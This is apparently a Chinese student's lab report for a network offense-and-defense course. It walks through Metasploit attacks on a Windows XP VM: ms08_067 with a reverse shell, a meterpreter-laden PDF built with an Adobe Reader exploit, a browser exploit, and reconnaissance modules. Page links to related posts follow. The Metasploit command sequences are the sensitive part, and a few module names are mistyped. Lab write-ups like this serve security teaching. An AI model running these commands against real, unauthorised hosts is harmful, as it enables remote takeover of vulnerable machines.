20155328 网络攻防 实验五:MSF基础应用
20155328 网络攻防 实验五:MSF基础应用
实践内容及过程记录
一、Windows服务渗透攻击————ms08_067
攻击机:kali
靶机:WindowsXP(英文版)
第一步,分别查看攻击机和靶机的IP。
在kali终端中,输入msfconsole
进入msf控制台,依次输入以下指令:
use exploit/windows/smb/ms08_067_netapiuse exploit/windows/smb/ms08_067_netapi
show payloads
set payload generic/shell_reverse_tcp
set LHOST 192.168.127.138
set LPORT 5328
set RHOST 192.168.127.139
set target 0
exploit
攻击成功,可以看到已经获取了靶机的系统信息:
二、浏览器渗透攻击————ms11_103
在kali终端输入msfconsole打开msf控制台,输入以下参数:
被攻击的主机可以看到网页无法正常打开:
回到kali,输入以下指令:
sessions
sessions -i n//n为显示的最大进程号
可以看到攻击成功了。
三、针对Adobe Reader的渗透攻击
在kali中进入msf控制台,输入以下指令:
use windows/fileformat/adobe)cooltype_sing
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
set FILENAME 20155328.pdf
exploit
生成了PDF:
将生成的PDF拷贝到靶机上。
kali中输入back,进入监听模块,输入以下命令:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.127.139
set LPORT 5328
exploit
然后在靶机上打开PDF:
攻击机显示攻击成功:
四、应用Aux辅助模块
1.browser_info
在kali终端中输入show auxiliary
,查看aux中都有哪些模块,最后选中gather/browser_info。
进入到msf控制台后,依次输入以下命令:
use auxiliary/gather_browser_info
set SRVHOST 192.168.127.138 //kali的IP
set SRVPORT 5328
exploit
可以看到生成了URL,且Server Start。
复制链接,在靶机(WindowsXP)中进行访问:
回到kali,可以看到已经获取了靶机访问该url的浏览器信息。
2.arp_sweep
先在kali终端中输入以下命令,手动创建一个msf所需的数据库:
service postgresql start
msfdb start
再输入msfconsole
开启msf,输入命令use auxiliary/scanner/discovery/arp_sweep
进入模块,设置参数:(RHOSTS填写kali所在的网段)
设定好了以后输入run
,可以看到除了自己主机IP外,还有三个其他IP:
在msf中输入命令db_nmap -O 192.168.127.139
(靶机IP),可以看到开启的端口号即靶机的目标操作系统。
基础问题回答
用自己的话解释什么是exploit,payload,encode。
exploit:利用漏洞或一切可利用的东西进行获取用户权限、篡改文件信息等操作。
payload:在靶机上执行的一段代码,可以反弹连接。
encode:对特征码进行编码,改变特征码。
实践总结与体会
这次实验主要是做的小模块比较多,感觉还。。挺厉害的。。再接再厉吧。
20155328 网络攻防 实验五:MSF基础应用的更多相关文章
- 20155201 网络攻防技术 实验五 MSF基础应用
20155201 网络攻防技术 实验五 MSF基础应用 一.实践内容 一个主动攻击实践,如ms08_067 一个针对浏览器的攻击,如ms11_050 一个针对客户端的攻击,如Adobe 成功应用任何一 ...
- 20155235 《网络攻防》 实验五 MSF基础应用
20155235 <网络攻防> 实验五 MSF基础应用 实验内容 一个主动攻击实践,如ms08_067; (1分) 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击 ...
- 2017-2018-2 20155225《网络对抗技术》实验五 MSF基础应用
2017-2018-2 20155225<网络对抗技术>实验五 MSF基础应用 ms08_067 用search命令,搜索与ms08_067相关的模块,如图: 找到了对应的攻击模块expl ...
- 20155313 杨瀚 《网络对抗技术》实验五 MSF基础应用
20155313 杨瀚 <网络对抗技术>实验五 MSF基础应用 一.实验目的 本实验目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.一个主动 ...
- 20145236《网络攻防》Exp5 MSF基础应用
20145236<网络攻防>Exp5 MSF基础应用 一.基础问题回答 解释exploit,payload,encode是什么: exploit就是负责负载有用代码的交通工具,先通过exp ...
- 20155226《网络攻防》 Exp5 MSF基础应用
20155226<网络攻防> Exp5 MSF基础应用 基础问题回答 1.用自己的话解释什么是exploit,payload,encode? exploit : Exploit的英文意思就 ...
- 20155301 《网络攻防》 Exp5 MSF基础应用
20155301 <网络攻防> Exp5 MSF基础应用 基础问题 1.用自己的话解释什么是exploit,payload,encode 答:exploit就是利用一些工具的,用来收集目标 ...
- 20155318 《网络攻防》Exp5 MSF基础应用
20155318 <网络攻防>Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode? exploit就相当于是载具,将真正要负责攻击的代码传 ...
- 20155321 《网络攻防》 Exp5 MSF基础应用
20155321 <网络攻防> Exp5 MSF基础应用 基础问题 用自己的话解释什么是exploit,payload,encode 关于exploit,我觉得exploit是利用一些工具 ...
随机推荐
- 解决跨域问题之anywhere
anywhere搭建服务,ionic PC端和手机端可以通过网址来查看网页效果.解决跨域问题 大家都知道编写完HTML代码后,可以直接在pc端的浏览器查看,但现在手机端越来越广泛了,想跟在pc端查看网 ...
- 微信小程序获取Access_token和页面URL生成小程序码或二维码
1.微信小程序获取Access_token: access_token具体时效看官方文档. using System; using System.Collections.Generic; using ...
- 11.@RequestParam @RequestBody @PathVariable 等参数绑定注解详解
对@RequestMapping进行地址映射讲解之后,该篇主要讲解request 数据到handler method 参数数据的绑定所用到的注解和什么情形下使用: 简介: handler method ...
- CSS揭秘(二)背景与边框
Chapter2 背景与边框 1. 半透明边框 基础:了解 RGBA & HSLA 颜色(色调 0~360.饱和度.亮度 (0%黑色~100%白色).透明度) 默认情况下,背景在边框的下层,容 ...
- SQLSERVER中的鬼影索引
SQLSERVER中的鬼影索引 看这篇文章之前可以先看一下鬼影记录 了解了解一下SQLSERVER里的鬼影记录关于鬼影记录的翻译一关于鬼影记录的翻译二 当删除表中的某一条记录的时候,索引页面的对应记录 ...
- python 多进程和子进程1
多进程的缓冲区 #多进程 process.py from multiprocessing import Process,current_process import time def func1(): ...
- python基础学习18----面向对象简述
这里就不再讲面向对象的相关概念知识或者与面向过程的比较了,直接进入类的学习 1.类的创建 class people: def __init__(self):#构造函数 pass sfencs=peop ...
- No module named 'MySQLdb' Python3 + Django 2.0.3 + mysql 无法连接
问题概览: 学习Django连接mysql数据库的时候遇到了问题 首先安装mysql(Python 3不支持MySQL-python): pip install pymysql 进入编辑 settin ...
- ZooKeeper 集群的安装部署
0. 说明 ZooKeeper 安装在 s102.s103.s104上,这三个节点同时是 Hadoop 的 DataNode 1. ZooKeeper 本地模式安装配置 1.0 在 s101 上进行安 ...
- Python学习(七)面向对象 ——继承和多态
Python 类的继承和多态 Python 类的继承 在OOP(Object Oriented Programming)程序设计中,当我们定义一个class的时候,可以从某个现有的class 继承,新 ...